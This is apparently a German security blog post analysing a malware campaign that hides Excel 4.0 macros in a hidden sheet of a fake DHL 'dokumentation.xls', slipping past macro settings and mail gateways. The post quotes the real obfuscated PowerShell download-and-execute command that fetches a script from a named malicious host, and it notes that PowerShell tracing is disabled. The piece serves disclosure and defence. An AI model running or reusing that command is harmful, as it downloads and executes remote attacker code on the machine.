Excel 4 Makros unterwandern Makroerkennungssysteme (Update 20.05.20)

Aktuell nutzt eine Malware ein Relikt aus alten Excel-Zeiten: Aus einem Tabellenblatt heraus wird ein Makro ausgeführt. Der Clou: Der User muss nichts anklicken, um den Schadcode auszuführen, Makrosicherheitseinstellungen greifen ins Leere. Und auch prominente Mailsecurity-Systeme, die eigentlich Makros erkennen sollen, versagen bei der archäologischen Makroanalyse.

Es ist lange her, aber ich erinnere noch: Es gab in Excel einmal die Möglichkeit, Makros in Tabellenblättern unterzubringen. Wie das genau funktioniert, ist auf zahlreichen Websites gut dokumentiert.

Aktuelle Malware belebt dieses Makrorelikt wieder: Als DHL-E-Mail getarnt flattert eine Datei namens „dokumentation.xls“ in den Posteingang. In einem versteckten Tabellenblatt in einer XLS-Datei befindet sich ein Makro, das eine Powershell öffnet.

Über die Analyseplattform https://any.run kann man in einer Sandbox das Malware-File ausführen und analysieren lassen.

Der Powershell-Befehl holt sich ein weiteres Powershell-Skript über die Commandline

powershell -command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://putin-malwrhunterteams.com/scan.txt');

das wiederum ein Powershell-Skript nachlädt. Zuletzt in der Kette werden zwei Dateien namens

C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFa88451.TMP

C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZXTJELWS4XSXUMW5WADG.temp

angelegt. Danach bricht zumindest die Aufzeichnung ab. Auf meinem Malware-Testgerät ist eine deutsche Windows-Version installiert – im Bereich „Zuletzt verwendet“ wird keine Datei ablegt.

Während der ganzen Aktion werden auf 158 Registry-Keys modifiziert. Zahlreiche Tracing-Optionen für die Powershell werden deaktiviert, Spracheinstellungen verändert und sogar die Most Recently Used-Liste von Excel unter

HKEY_CURRENT_USER\Software\Microsoft\Office\[Version]\Excel\File MRU

modifiziert, indem ein Verweis auf die Datei

C:\Users\[Username]\Documents\test.xlsx

Item 1 eingefügt wird. Mein Testnotebook scheint nicht vollständig kompatibel mit dem Schadcode zu sein, die Modifikation der Registry konnte ich so nicht nachvollziehen (Windows 7/Excel 2016).

Durchgeschlüpft

Während die Malware-Analyse zwar halbwegs interessant, aber nichts besonderes ist, ist der Modus Operandi schon interessant. In Firmen kommen oft Security-Gateways zum Einsatz, die bereits vorab schädlichen Inhalt herausfiltern. Diese scheinen vielfach auf die Excel-4-Auge blind zu sein. Makros in xls-Dateien schlüpfen hier kommentarlos durch.

[Update 15.05.2020]:
Pressemitteilung Gdata Netwire/Excel4 Makros

[Update 18.05.2020]
Ein großer Gatewayhersteller schreibt mir: „Kindly note that we have a vulnerability on Macro content filter, Content filter Macro Detection is not able to identify Excel 4 macros we already have an opened defect for old excel files macro detection and our development team working on it“

[Update 20.05.2020]
Wer sein eigenes System auf Anfälligkeit testen will, kann hier eine Testdatei herunterladen. Sie öffnet direkt nach dem Öffnen in Excel ein ALERT-Fenster mit einer unschädlichen Warnung.